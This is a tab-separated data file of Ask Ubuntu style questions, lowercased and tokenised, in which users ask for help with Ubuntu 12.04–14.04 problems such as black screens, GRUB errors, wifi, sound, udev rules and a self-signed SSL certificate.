489223	nvidia 410m - no backlight	i 've been running ubuntu 14.04 on my laptop , a sony vaio vcgep33f , but a few days ago i began using nvidia drivers ( 331.79 ) this laptop also has an intel integrated gpu , but i have disabled it in the bios , and so long the os has not noticed it . my question is the following , since i started using nvidia drivers , sometimes as i boot up the computer , after grub ( i have windows 8 installed along ubuntu ) the screen will go black , with no backlight and so it will stay . may i flash a light at the screen i can see it'working , i can login , but can not see crap . if i reboot the computer several times ( itĺ random , and between 3 or 7 ) sometimes i see a nvidia logo and that is when the backlight will be on , else i will be stuck with no backlight at all . then , if i connect a display to the vga output during boot and disconnect it after logging in the laptop 's screen will be on . i 've been researching on the issue , but have not found anything like this , many people need to use bumblebee , me nope as i disabled the other gpu , many people have no brightness cntrol , which i have if the screen is on . although annoying , i said it solves itself but i would like to know how to fix this ! thanks in advance .
489228	how to modify application-specific keyboard shortcuts ?	in unity , can i modify the keyboard shortcuts specific to a particular application ? for example , the google chrome shortcut for `` full screen '' is f11 by default . suppose i want to change it to be f12 ( or whatever ) . also , is there a single place to do this for all applications ( e.g. , an `` application shortcuts '' tab under settings > keyboard ) , or can it only be done within a particular application ? thanks !
489230	blank screen while booting ubuntu server 14.04 on atom n2600	i just bought a jetway computer with 2gb ram and 60gb ssd . it is intended to be used as firewall and i installed ubuntu server 14.04 32bit on it without any problem . booting starts perfectly with scrolling text displayed on the screen as expected . then i see some messages about a plymouth-upstart-brige respawn . and then the screen gets all black . the display reports that it gets no signal after a few tens of second and go to sleep mode . the display never wakes up . no prompt , nothing . but the boot process continues and i 'm able to log in with ssh since i configured the network and installed the ssh server during the installation process . the problem is just that i get no display . i 'm able to change the grub boot parameters , look into the log files and install packages if needed . the system is thus somehow usable . but i do n't have any console access .
489232	error in apt-get update	i have been getting following error while running sudo apt-get update w : gpg error : https : //download.01.org trusty inrelease : the following signatures could n't be verified because the public key is not available : no_pubkey a902dda375e52366 e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_trusty-security_main_i18n_translation-en e : the package lists or status file could not be parsed or opened . what should i do to fix this problem ? also sometimes i get a red icon in the task bar pane .
489236	touchpad nearly inactive in ubuntu 14.04	i have a laptop asus x550ld . when i installed ubuntu 14.04 i had to use my keyboard . the mousepad is nearly unresponsive , like when i rollover too fast the cursor moves a bt few seconds later . i increased the speed from 'mouse and touchpad settings ' . please help .
489238	how to enable the usage of number keys while using ubuntu	i can not use some of my keyboard keys while i can use the same keys in windows [ i am dual-booting between ubuntu and windows ] i have highlighted those keys which i cant get in ubuntu so in short how to get those keys work .
489246	to install onedrive on ubuntu	to install onedrive on ubuntu , i 've followed the instruction from here : onedrive-d syncs files to and from microsoft the installation seems right , till the end , when the `` preferences '' window appear , i clicked on the `` connect to the onedrive.com '' buttion : an error occured : : ~ $ onedrive-prefs not sandboxed [ error : flash/platform/pepper/common/pep_process.cpp ( 19 ) ] check ( g_process_type == process_type_unknown ) failed java version `` 1.7.0_55 '' openjdk runtime environment ( icedtea 2.4.7 ) ( 7u55-2.4.7-1ubuntu1 ) openjdk 64-bit server vm ( build 24.51-b03 , mixed mode ) aborted ( core dumped ) how to solve it ?
489247	14.04 asus g56jr fn + brightness control	i have recently installed ubuntu on my new asus g56jr laptop . i noticed that despite all the other fn+fx keys are working , the screen brightness does not . i have already tried editing the grub , as many here earlier advised , with no result . also i tried using various drivers . atm i am using the nvidia binary driver 331.38 and my grub file looks like this : grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash pcie_aspm=force acpi_backlight=vendor '' grub_cmdline_linux= '' '' i know this has been already asked plenty of times , but i couldn ' t find any working solution . edit unlike many others i can actually set the brightess in settings .
489249	ubuntu installation failing	i have downloaded ubuntu14 ( also tried with ubuntu 12 ) from internet and trying to install it dual boot with windows vista from the vista machine itself . it fails with one roxio pop up message `` can not execute command because : unknown error '' . i had ubuntu installed on this machine earlier also . i had downloaded ubuntu ( wubi ) from internet and installed and it worked great till i ran updates recently and it started hanging after booting . can you please help ? many thanks in advance . p
489250	laptop ca n't reconnect to new wifi hub after suspend	i have a dell inspiron 5520 laptop with an intel centrino wireless-n 2230 card , running ubuntu 14.04 . the wifi worked flawlessly with my old virgin media superhub , but after being `` upgraded '' to a superhub 2 , the laptop usually fails to reconnect to the network after i suspend it - all my other devices work fine , though it 's the only one in the house running linux . the laptop can always see the network , it just takes ages trying to connect after being suspended and eventually gives up - dmesg shows some `` authentication timed out '' errors . i have tried two different usb wifi adapters that work perfectly on a windows desktop , and both exhibit the same problem on the laptop . the only workarounds i have found so far are to reboot the laptop or hub , change the wifi channel , or disable wifi security . i 've tried restarting network-manager , deleting the connection from the manager , and turning the wireless card off and on with the button on the keyboard - none of these seem to help . i 've tried all the suggestions on this thread and this one ( though their issues seem very slightly different ) , and none have any effect , except that sudo modprobe -r iwlwifi gives me an error : modprobe : fatal : module mac80211 is in use . modprobe : fatal : error running remove command for iwlwifi . does anyone have any ideas as to what to try next ? i 'd be very happy with a more convenient workaround if i ca n't find a permanent solution .
489252	thunderbird not checking for new mail ?	since the update to kernal 3.13.0.30 , thunderbird 24.6.0 does not check for new mail on my system . i have tried clearing the 'automatically check for new mail ' , quitting the program , and restarting the program and resetting the checkbox , but the automatic feature does not work at this time . the 'get new mail ' function also does not work - at this time i have to exit thunderbird and restart the program to receive new mail . has anyone else seen this behaviour , or know of a fix ?
489253	i installed mythbuntu 14.04 and ca n't get my remote to work	i try to restart lirc and i get the following error : find : `/sys/class/rc/*/ ' : no such file or directory * stopping remote control daemon ( s ) : lirc [ ok ] * loading lirc modules [ ok ] find : `/sys/class/rc/*/ ' : no such file or directory * starting remote control daemon ( s ) : [ ok ] i tried typing in irw to see if i get anything and i get absolutely nothing here is the hardware info i : bus=0003 vendor=147a product=e031 version=0111 n : name= '' formosa21 ir603 hid mce '' p : phys=usb-0000:00:1d.1-1/input0 s : sysfs=/devices/pci0000:00/0000:00:1d.1/usb7/7-1/7-1:1.0/input/input3 u : uniq= h : handlers=sysrq kbd event3 b : prop=0 b : ev=10001f b : key=4837fff072ff32d bf54444600000000 1 20f908b17c000 677bfad9415fed e09effdf01cfffff fffffffffffffffe b : rel=40 b : abs=100000000 b : msc=10 here is the lsusb output bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 008 device 002 : id 045e:0040 microsoft corp. wheel mouse optical bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 147a : e031 formosa industrial computing , inc . bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub i just cant seem to get it to work . my system is up to date .
489254	logic words alternative	i am using logic words to design circuits like alu , on windows in class and my pc itĺ running only ubuntu , my question is how i can open this extension ( .cct ) on linux , please not tell me about virtual machine . thanks .
489255	the ubuntu partition on my hard disk is not detected on windows . what to do ?	i had a laptop with windows and ubuntu on it on 2 different partitions . then the laptop stopped working due to issues not related to this question . i took out the hard drive and put it into an external enclosure to get the data . when i connect it to my other windows machine , it detects all the other partitions except the ubuntu one . what to do ? i would love to be able to extract data from ubuntu . ps - if recovering data is not possible then can i at least format it to get the space back so i can use the hard disk as an external hdd ?
489258	ubuntu emulator requires ubuntu-one account , still does n't work after adding	when i install the ubuntu sdk and emulator , i only get a black screen - the emulator log shows : loading , please wait ... [ 1.310000 ] systemd-udevd [ 84 ] : starting version 204 begin : loading essential drivers ... done . begin : running /scripts/init-premount ... done . begin : mounting root file system ... begin : running /scripts/local-top ... done . begin : running /scripts/local-premount ... done . [ 2.880000 ] initrd : mounting /dev/mmcblk0 [ 2.900000 ] ext4-fs ( mmcblk0 ) : could n't mount as ext3 due to feature incompatibilities [ 2.910000 ] ext4-fs ( mmcblk0 ) : could n't mount as ext2 due to feature incompatibilities [ 3.570000 ] ext4-fs ( mmcblk0 ) : recovery complete [ 3.570000 ] ext4-fs ( mmcblk0 ) : mounted filesystem with ordered data mode . opts : discard [ 3.610000 ] ext4-fs ( loop0 ) : could n't mount as ext3 due to feature incompatibilities [ 3.630000 ] ext4-fs ( loop0 ) : could n't mount as ext2 due to feature incompatibilities [ 4.680000 ] ext4-fs ( loop0 ) : recovery complete [ 4.690000 ] ext4-fs ( loop0 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 4.690000 ] initrd : mounting system.img ( image developer mode ) [ 4.800000 ] ext4-fs ( loop1 ) : could n't mount as ext3 due to feature incompatibilities [ 4.830000 ] ext4-fs ( loop1 ) : could n't mount as ext2 due to feature incompatibilities [ 4.930000 ] ext4-fs ( loop1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 5.010000 ] initrd : device is generic [ 6.280000 ] initrd : checking mount label mtdblock2 [ 6.320000 ] initrd : mounting /dev/mtdblock2 as /root/android//cache mount : mounting /dev/mtdblock2 on /root/android//cache failed : invalid argument [ 6.370000 ] initrd : mounting /root/var/lib/lxc/android/system.img as /root/android/system begin : running /scripts/local-bottom ... done . done . begin : running /scripts/init-bottom ... done . [ 9.250000 ] init : ureadahead-touch main process ( 260 ) terminated with status 5 [ 37.150000 ] init : /dev/hw_random not found [ 37.150000 ] init : can not open '/initlogo.rle' [ 37.310000 ] init : /dev/hw_random not found [ 37.710000 ] healthd : wakealarm_init : timerfd_create failed [ 39.130000 ] init : can not find '/system/etc/install-recovery.sh ' , disabling 'flash_recovery' [ 39.130000 ] init : can not find '/system/bin/ubuntuappmanager.disabled ' , disabling 'ubuntuappmanager' [ 39.530000 ] init : property 'sys.powerctl ' does n't exist while expanding ' $ { sys.powerctl } ' [ 39.530000 ] init : powerctl : can not expand ' $ { sys.powerctl } ' [ 39.530000 ] init : property 'sys.sysctl.extra_free_kbytes ' does n't exist while expanding ' $ { sys.sysctl.extra_free_kbytes } ' [ 39.530000 ] init : can not expand ' $ { sys.sysctl.extra_free_kbytes } ' while writing to '/proc/sys/vm/extra_free_kbytes' [ 39.650000 ] init : can not find '/sbin/adbd ' , disabling 'adbd' [ 54.630000 ] systemd-logind [ 658 ] : cgmanager : cgm_list_children for controller=systemd , cgroup_path=user failed : invalid request has anyone had any success setting up an emulator , and is n't it generally recommended to have ubuntu on a device for debugging , as is the case for android ? if so , what is the best-supported phone ? update-2 : it must have been some service i did n't restart - next boot after installing the ppa again seems to have fixed it . unfortunately it seems the accounts tab wo n't work , and it wo n't connect to ubuntu one - which is apparently required to use the app installer . is this just a bug , or is ubuntu-phone going to be like android , requiring licensing to use the repo ? ubuntu store in desktop does n't require an account , is this just a restriction on ubuntu-touch prerelease ?
489259	what desktop environment is this ?	i saw this picture in some question before . i tried searching for what desktop it is but i could n't figure out . does anyone know ?
489261	grub rescue unknown filesystem nothing happens	i 'm totally new here and have nook idea of the whole system . my problem : i installed ubuntu 3 months ago on my pc next to my windows 7 . i have n't got much time to learn about it and i needed the space on my hard drive so i deleted it ... in a wrong way . i just formatted the the partition in windows and thought everything was fine until i tried to start my pc again . i am now stuck with : `` error : unknown filesystem grub rescue '' . so i googled like an idiot and did n't find any solution for my problem . i tried typing `` ls '' and and `` ls ( hd0 , msdos1 ) for example or just ls ( hd0,1 ) but only answer i got was `` unknown filesystem '' . i downloaded a windows rescue iso and installed it via unetbootin , changed in bios the boot to usb-hdd and then it get stuck with `` verify data pool.. '' or something like that . then i used supergrubdisk2 on the usb but that did n't help either . first i got stuck in a loop where it counts down from 10 and could only press default , then i got stuck again with `` verify ... '' . after that i installed ubuntu again on the usb and tried to boot that but same as the others . i even tried `` usb_zip '' in bios , i formatted the usb stick but nothing happened . i do n't have the original windows cd where i can use the `` windows repair '' and my other pc where i did all the installing is a macbook ( which i use now ) . so please , if anyone has an idea what to do , give me a feedback ! it would be also okay to reinstall ubuntu again , i just need windows right now
489265	prevent custom repository from overriding distribution package ubuntu 14.04	i have a custom repo in my sources to provide smartgit : ppa : eugenesan/ppa for the last week i havent been able to get past the login loop trying everything under the sun . today i found that this repo updated these 4 packages to a custom version ( based on gnome 3.12 ) : ubuntu-session gnome-session-common gnome-session-bin gnome-session this was not desired and has since been fixed . i would like to keep this repo for smartgit but not have it override anything else . is this possible ?
489266	ubuntu 14.04 lts bluetooth not working	well i changed from windows 8.1 to ubuntu 14.04 lts yesterday , my first time ever using any linux os so am really really new to this terminal and all that , been trying to fix the bluetooth from yesterday but to no avail , when i turn it on nothing happens at all , i want to turn it on to connect to my bluetooth mouse . i can post a picture if it can help but i do n't know how ... .
489267	keyboard for fine-grained window placement	i 've been upgrading my ubuntu for a couple of years , from version to version . i just installed a fresh copy of ubuntu 14.04 ( and i like it = ) but i 'm suddenly missing a super nice feature ... can someone help me find it ? in my old setup i could press ctrl-alt-num to do pretty complete window placement ( num is a numeric keypad number ) . the mappings go something like : ctrl+alt+5 maximizes ctrl+alt+1 , 3 , 7 , 9 moves the window to a corner quadrant . pressing it again , changes it from 1/4 of the screen to 1/6 , then again goes to 1/8 . ctrl+alt+2 , 4 , 6 , 8 moves the window to a half of the screen . pressing it again changes it to 1/4 of the screen , etc . in my new stock ubuntu 14.04 , doing the same action only moves the window to occupy 1/2 of the screen ( for edges ) or 1/4 ( for corners ) . i tried installing compiz and using the grid thing , but it did n't seem to support what i 'm looking for ( and it 's not installed on my old system ) . how did i get that behaviour in my old ubuntu ? help ? this is a screenshot of how my old setup worked : important note : i 'm up for a better solution too , mine did n't work perfectly - basically i just want a keyboard solution to window placement . any alternative suggestions would be welcome as well . i have a largeish screen and need to be able to get 8 windows on a screen .
489271	would increasing my swap partition 's size benefit my computer 's performance ?	apparently increasing the size of the swap should make my computer able to handle more applications because it can `` push more data aside '' into the swap . ... or will it make the computer hang more because it 's putting everything in swap ? so this means that it should n't be too big or too small ? in short ; which is correct ? ; the bigger the swap the better . swap should be balanced according to `` something ( ? ) '' .
489274	how to get edubuntu with gnome 3.2 environment at the time of installing edubuntu	i have recently downloaded iso file for edubuntu but till now i have not installed it and i am using gnome now i just want to know that can i have gnome environment in edubuntu while installing it into my computer .
489281	copy & paste non-ascii characters to an emacs window from another window does n't work correctly	i work with emacs with iso-8859-1 coding system . i use emacs23 . i have these lines in my .emacs file : ( setq default-buffer-file-coding-system 'iso-8859-1 ) ( set-selection-coding-system 'iso-8859-1 ) however , if i try to copy a non-ascii character from another window and paste it to my emacs window , it does n't work correctly . for instance , if i try to copy and paste `` ì '' i get `` ã¬ '' . how can i fix it ?
489284	stuck at purple screen ubuntu 12.04	from yesterday i am having problem while booting up my ubuntu laptop . its specs are : if i boot up normally it gets stuck at purple loading screen and nothing happens , if i press alt+ctrl+f1 it takes me to tty1 login , when i login there terminal opens up to enter any command , the gui does n't loads , i even tried startx or sudo startx command it shows this error . i know there are various similar questions like these , i searched most of them but none of them , worked . most common method was pressing e at grub and booting with `` nomodeset '' it does n't shows purple screen but it shows a black screen and tells to login , sometimes it goes completely black and when i press alt+ctrl+f1 it takes me to the login and same as i explained above happens , terminal shows up . i did this but nothing fixed its still the same . i also tried this method . it enabled kmod : fglrx_experimental_13 , but still gui doesnt shows up even i cant start failsafex mode from recovery menu , it shows an error and returns back to recovery menu . i am having portable windows 8.1 installed on external hdd and its working perfectly fine on same laptop . meanwhile i burned ubuntu 14.04 iso on a usb disk and booted by it , tried live session , the files are showing up but i cant copy or cut them it shows the error that you do n't have access to these files . is there any other way i can backup my files , the portable win 8.1 does n't shows those files . edit : i managed to copy my files by using the command `` sudo nautilus '' in ubuntu live session . thank god does restoring to factory state from grub will fix the issue , will it delete my files ? edit : i dont care if it will delete my files , but will it restore it as it was ? for info : i think this is gpu driver problem , i have never installed any amd driver manually , however i installed updates regularly . only things i installed manually were google chrome , vlc media player and ubuntu tweak to clean up junk files as boot drive was almost full ( but i do n't think that has caused a problem i have used it before and it never caused any problem ) . please do n't mark this as duplicate i have seen many similar threads like this but most of them said using `` nomodeset '' which did n't worked . this laptop was given to me by college so if anyone knows please suggest me a way to fix this i do n't want to reinstall ubuntu . thanks
489286	issue during update-grub	similar question have been previously asked , i have gone through them without any solution , that is why i am posting a new one . i have built and installed a new kernel ( compiled from source ) using the generic config file available in /boot after installing the kernel , i run the following command sudo update-grub at which i receive this message /usr/sbin/grub-mkconfig : 6 : /etc/default/grub : 10 : not found i inspected into the issue , in /etc/default/grub the line number 10 reads grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` i found out that there was no lsb release , and so i installed it using sudo apt-get install lsb-core strangely the 6th line in the file grub-mkconfig is a comment . after this i am clueless as to what to do.. any hints would be highly appreciated . here is my /etc/default/grub file http : //paste.ubuntu.com/7717187/
489287	does comodo antivirus support ubuntu 14.04	does comodo antivirus for linux work with 14.04
489289	ubuntu 14.04 does n't start normaly	after installing new version of ubuntu . that does n't start normaly . i must be start that with recovery mode and choose resume to start successfull ubuntu . in start normaly sceen is black and does n't any change
489291	just installed ubuntu on asus r512c . wifi adapter apparently not recognized	no wireless network visible during installation , which i finished with cable , and none in settings/network . how can identify my adapter ? download an appropriate driver ?
489292	the screen freezes dragging windows between workspaces in ubuntu 14.04 lts	i 've just installed ubuntu 14.04 in my laptop ( samsung qx310 , intel core i5 , geforce 310m ) and the problem is when i want move windows between workspaces . the system freezes ! do you know which is the problem ? is a ubuntu bug ? or my hardware laptop ? thank's
489294	adhoc connection between ubuntu to ubuntu	on one machine i created one adhoc network with manual setting . that mean not providing any manual ip addresses . and from another machine i am trying to connect that ad hock network.it is showing me that ad hock network in my wireless network list.but i am not able to connect . i tried with windows machine . from windows machine i tried to connect and its working fine.but with ubuntu to ubuntu its not connecting . am i missing something . need some help . thank you . lo no wireless extensions . vmnet8 no wireless extensions . wlan0 ieee 802.11bgn essid : '' newnet '' mode : ad-hoc frequency:2.412 ghz cell : f6:6a:64:3c : ad:59 tx-power=13 dbm retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . vmnet1 no wireless extensions . wlan0 link encap : ethernet hwaddr ec:55 : f9:77:90:88 inet addr:10.42.0.1 bcast:10.42.0.255 mask:255.255.255.0 inet6 addr : fe80 : :ee55 : f9ff : fe77:9088/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:142440 errors:0 dropped:1625 overruns:0 frame:0 tx packets:82989 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:58226725 ( 58.2 mb ) tx bytes:15528756 ( 15.5 mb )
489295	how can i remove netflix-desktop to get the hd option back on netflix ?	i installed pipelight using this tutorial to watch netflix using firefox on ubuntu 14.04 and everything went well . after a couple of weeks and because of lagging problems watching hd stuff on netflix , i decided to try netflix-desktop . the thing is that netflix-desktop did n't solve my lagging problems and also took away the hd option from netflix . i uninstalled netflix-desktop using this and , since i still did n't get the hd option back , i removed pipelight , wine , the .wine-pipelight folder and used autoremove for the packages left . after reinstalling everything i still ca n't get the hd option back . has anyone had this problem or know how to solve it ? thank you .
489297	installng ubuntu over xp	ubuntu 12.04 - booted on my pendrive , trying to boot , but only boot screen appears . when i select boot from usb then directly windows xp get started . how to install it ? is there any driver problem ? having 1 gb ram and 40 gb hard disk pc .
489298	audio is lost while converting a video file using avconv	i was converting a file from avi to mp4 using avconv : avconv -i 'supernatural s01e10 hdtv.avi ' -c : v libx264 -c : a copy -y 'supernatural s01e10 hdtv.mp4' the file has the following properties : # avconv -i 'supernatural s01e10 hdtv.avi' avconv version 0.8.10-6:0.8.10-1 , copyright ( c ) 2000-2013 the libav developers built on feb 5 2014 03:52:19 with gcc 4.7.2 [ mpeg4 @ 0x21d1b40 ] invalid and inefficient vfw-avi packed b frames detected input # 0 , avi , from 'supernatural s01e10 hdtv.avi ' : duration : 00:42:08.51 , start : 0.000000 , bitrate : 401 kb/s stream # 0.0 : video : mpeg4 ( simple profile ) , yuv420p , 608x336 [ par 1:1 dar 38:21 ] , 23.97 tbr , 23.97 tbn , 23.97 tbc stream # 0.1 : audio : mp3 , 24000 hz , stereo , s16 , 48 kb/s while playing back the converted file , i am not getting any audio output . what could be wrong ?
489301	read lines from a text file in qml qt/quick	i need open a text file and read it 's contents line by line and store each lines in a string list in qt quick 2.2 . can every one help me ?
489302	how to download vlc ?	i want to install vlc . when i ask it to download in ubuntu , it tells me to 'choose an application ' . what does it mean , and what should i do ? clicking on 'choose ' gives me a list of my own files and i 'm no wiser .
489306	execute script on insertion of sdcard	since i want some union mounts to be created , once a sd card is found in my system , i wrote the following udev my.rules : action== '' add '' , kernel== '' mmcblk0 '' , subsystem== '' block '' , \ run+= '' touch /tmp/my_udev_rule_matched_ok '' now sadly , /tmp/my_udev_rule_matched_ok never appears on my system . is there anything wrong with the matching ? when i use udevadm monitor , i see the event fired if i plug in the sd card . and when i do udevadm test , my.rules is shown as read . sadly i have not yet figured out , how to get a log of the internal decisions of udev .
489309	how to give access to guest user to a particular directory in 12.04 ?	i have ubuntu 12.04 installed . i want to give access of a specific folder of my administrator account to a guest user . how can i do that ? eg . take folder as ~/videos . so that if anybody log-in as a guest user can watch at least movies . all ideas are welcome .
489310	ubuntu 14.04 lts xrdp grey screen	i have configured ubuntu 14.04 lts so i am able to xrdp from a windows 7 pc into the xfce desktop , unfortunately the xfce desktop only shows for one specific linux user , if i rdp to the box with another user then the screen is just grey with the x cursor . any ideas please ?
489316	how to uninstall programs ( comodo )	so comodo wont work properly so i want to uninstall it . i dont want to install other programs that are not legitiment
489320	password passes through login screen to active desktop window	i get to my computer . shake my mouse and the ubuntu login screen shows up . i start typing my password and nothing happens . i click enter . ( since i do this without thinking ) i notice the focus in the password box is n't there . i manually click into the password box and enter my password and sign in successfully . i then realize that whatever my last active window was ( whether it was an irc chat window or website ) , whatever i entered when attempting to enter my password on the logon screen went there . i 've done this multiple times now posting my password in irc channels and website comments because i thought i was at the login screen . i 've looked for similar bugs and looked through settings , wonder if anyone has replicated / solution ?
489321	installing mediatomb or other dlna server to play files on samsung series 5 led tv	need help installing a dlna server so as to play video files through the ethernet port on samsung series 5 led tv . most of the links recommended mediatomb , but i am unable to edit the config file in etc/mediatomb . it says permission denied as you are not the root user . i am not particularly interested in mediatomb , any other dlna server too would do provided i am able to install it on ubuntu . i am already using upnp on android mobile and nokia 'play to ' on windows phone .
489322	what does the `` install alongside windows '' feature do exactly ?	i 'm installing ubuntu and unfortunately i have n't been able to find in detail what the `` install alongside windows '' feature will do . here 's my configuration : drive 1 : boot partition windows partition ( ntfs , 180 gb ) free space ( 80 gb ) drive 2 : data ( ntfs , 250 gb ) now , of course , i 'd like to use the free space for ubuntu mount points and everything else untouched . will this feature touch any of my other drives or partitions ?
489327	my ubuntu disappeared !	i 've choosed to upgrade from windows 7 to windows 8 . when i started up my computer , i saw grub and i could choose between windows 7 and edubuntu 12.04 . but now , when i start up computer , it 's just booting windows 8 ! ( i have n't formatted or anything like that ) please help me !
489328	running ios and windows apps from ubuntu	is there any way to compile windows or ios phone apps from ubuntu ? if `` yes '' what kind of program should i be using ?
489329	how to stop nautilus managing desktop	how can i stop nautilus creating a desktop when it is run in kde environment . is there a way to make nautilus command work the same as nautilus -- no-desktop ? i downloaded tweak tool . it has no option for stopping nautlius . gconf-editor did not help .
489332	ubuntu 14.04 no sound no settings	i upgraded to 14.04 after a few days my sound was gone and now the menu on system settings is incomplete items have disappeared i 've been in forums looking and searching for answers i can not connect to the internet using a dongle and no wifi can be detected ubuntu 14.04 lts ( gnu/linux 3.13.0-29-generic i686 ) please help i been running various sudo apt-get install commands non have worked i need to get sound and systems settings and my wifi options and videos working on my laptop
489334	what is my password for kubuntu ?	i just installed kubuntu . what is my password ? i 've never entered a password but it wo n't open to the desktop unless i enter a password . thanks
489335	can not update from ubuntu 12.10 to 13.04	i have been trying to update from ubuntu 12.10 to 13.04 for several days . whenever i try to run the upgrade , i get the following message : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found , w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/binary-i386/packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . the update then terminates . is there any work around to this ?
489336	ssl certificate common name is invalid	i generated ssl certificate and installed it according to how do i install a root certificate ? then i configured nginx to use this certificate . but wget https : //mysite.com shows me the following : self-signed certificate encountered . error : certificate common name is invalid ( contains a nul character ) . this may be an indication that the host is not who it claims to be ( that is , it is not the real mysite.com ' ) . to connect to mysite.com insecurely , use -- no-check-certificate ' . what is wrong with the certificate ? i generated it using the following command : openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout nginx.key -out nginx.crt -config openssl.cnf openssl.cnf contains the following : [ req ] default_bits = 2048 prompt = no encrypt_key = no default_md = sha1 distinguished_name = dn [ dn ] c = ie o = awmh 0.cn = mysite1.com 1.cn = mysite2.com 2.cn = mysite3.com along with all the other lines copied from my default /etc/ssl/openssl.cnf openssl x509 -in mycert.crt -noout -text shows the following : certificate : data : version : 3 ( 0x2 ) serial number : 12567862243061732220 ( 0xae6a041f67bd137c ) signature algorithm : sha1withrsaencryption issuer : c=ie , o=awmh , cn=milomag.ru , cn=slogpost.ru , cn=developernote.com , cn=aroma.developernote.com , cn=pechat.developernote.com , cn=essence.developernote.com validity not before : jun 28 17:47:20 2014 gmt not after : jun 28 17:47:20 2015 gmt subject : c=ie , o=awmh , cn=milomag.ru , cn=slogpost.ru , cn=developernote.com , cn=aroma.developernote.com , cn=pechat.developernote.com , cn=essence.developernote.com subject public key info : public key algorithm : rsaencryption public-key : ( 2048 bit ) modulus : 00 : c5 : aa : ab : be:53 : aa : f1:92:1a:7e : ac:1d : ac:9d : e3:2a:8a:1d:04:5c:60:14:3b:1e : a5 : cd:64:15:3a : 0d:7e:7e:65 : c3:1d : c6:1d:39:27:3c:73:89:3f:33 : 6e:19:02:84 : a2 : fd:52 : fe : de:94:3b:73 : f3:38 : e4 : 87:55 : ed : b7:94 : b6 : f1:0c:4b:5b:79 : d7 : c9:52:7a : cf : e0:93:4d : b9:9c:3a:9e:34:9d : ca:9f : f3:07 : d9 : 59:5c:21:87:2f:22:33:00 : f9 : b6:9e:4b:45 : d7:3f : b8:73:25:7e : e3 : e9:6f : cb : e3 : d3 : b2:63 : a1:48 : ac : 2b:71 : fa : e9:16:90:11 : eb:93:57:25:50:8d : d1:83 : 57:28 : ee:16 : fe:12:50 : f4 : d1:3a : a5 : d7:53:74 : ef : af:53:14:3f:4a:9a : c1:8a:4f : cc:6c : ff:53:65 : ff : 66 : d8:34 : d4 : a4:14 : fa:05:67:81 : ba:88:20:63:0d : 96:7d:35 : cf:9f:3e : c7:5a:6b:05 : c9:39:00 : bc:19 : ea : c9:0c:65 : a9 : a8:83 : df:90:81:06:38 : e1 : dc : bd : 9d:4b:76:8d:11:3c : a6 : be:34:23:8e:68:82 : bc : b3 : 63:4f:3a:3a:9d : c1:68:73 : fb:18:7b:9c:93 : a7 : bd : 2d:47 : b4:35 : a0 : cb:01 : f2 : ef:42:81 : be : b6 : f1 : c9 : 49 : ed exponent : 65537 ( 0x10001 ) x509v3 extensions : x509v3 subject key identifier : 53 : c3:95:78:7a : a5 : e8:6b : f9:9c:80:2b:46:08:70:80:8f:2e:8f : c4 x509v3 authority key identifier : keyid:53 : c3:95:78:7a : a5 : e8:6b : f9:9c:80:2b:46:08:70:80:8f:2e:8f : c4 x509v3 basic constraints : ca : true signature algorithm : sha1withrsaencryption 84 : aa:5f:6e:12 : a2 : b9:80:64:4e : e3 : f4:2f:39 : e5:0e:98:3c : ad : a3 : a3 : c4 : f0:50:9b:14:2d:27:1b : de:87:76 : db:8d:85:5a : ef : e0:1c : d2 : ed:3d : ab:3b : c1:88:67:88 : df : fc:7a : e1 : a1 : d1 : a4 : a7 : c2 : d6 : c4:13 : c6:8d:45 : cf:4c:85:46 : b1 : ca:32:0d:49 : ff : fe : a8:0a:3b:8d : f6:90:5f:18:34 : cc:39 : d3:1a:79 : f2:54 : 6b:2f:1f:80:77 : e6 : fe : e8 : d1:66:4e:95:6a:28 : ca:7e:73:4f : 83:46:5b:03:68 : e1 : fa:9e : fe:6d:37:36 : a5 : e2:62 : bf:4e : e5 : 6a : bc:5c:5f : e0 : c9 : a3 : f4 : c9 : b8:22:44:7a : ca : bf : b2 : e5 : b5 : 2c : bc : ff:63:10:87:5c:7f : ea:47:04 : c1 : a1:3e:3e:18:44:4d : f9 : af : ce:8d : b9 : ec : f4 : fd:25:41:03:81:81:4a:03:69:04 : a8 : ad:00:41 : e2 : e5:07 : de : f2:3f:99:57:34 : cc : d6:08:9c:7c : fe : d6 : a8 : f0:5f:56 : f5:20 : a5:5d:19 : ea:5a:34:6d : d8 : d2 : a4:8f : c2 : d9 : d5:22:5c:1e:87:87:9d : a0 : ba:62:04 : e5:28:1a:3e:43 : 7c:7b:50:8d : f4 : f5:5b:9a:4e : ab:55 : b5 : fe : df:97:9a:1a : f6 : ab : df:0f : c1 today i found wget bug description : https : //bugs.debian.org/cgi-bin/bugreport.cgi ? bug=447266 , my wget version is ( gnu wget 1.13.4 built on linux-gnu . ) , but looks like i have the same situation . firefox and ie on windows machine accepts my certificate with no problem .
489337	ca n't access windows share	my sister has a windows 7 laptop with some shared folders over the network . from my ubuntu 14.04 laptop in files , browse network , i can see and access her workgroup but when i try to access her pc it keeps asking for credentials ( user , workgroup , password ) . so it keeps asking over and over even know i already provide the right ones .
